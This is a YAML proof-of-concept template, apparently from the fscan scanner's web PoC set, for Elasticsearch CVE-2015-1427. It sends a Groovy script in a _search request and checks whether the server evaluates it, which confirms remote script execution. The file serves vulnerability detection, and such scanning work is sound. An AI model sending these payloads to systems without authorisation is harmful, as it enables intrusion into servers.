fscan/Web_Scan/pocs/elasticsearch-cve-2015-1427...

35 lines
875 B
YAML

name: poc-yaml-elasticsearch-cve-2015-1427
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: /test/test
headers:
Content-Type: application/json
body: |
{
"name": "test"
}
expression: |
response.status == 201
- method: POST
path: /_search
headers:
Content-Type: application/json
body: |
{
"size":1,
"script_fields":{
"lupin":{
"lang":"groovy",
"script":"{{r1}}*{{r2}}"
}
}
}
expression: |
response.status == 200 && response.content_type.icontains("json") && response.body.bcontains(bytes(string(r1 * r2)))
detail:
author: pululin(https://github.com/pululin)
links:
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-1427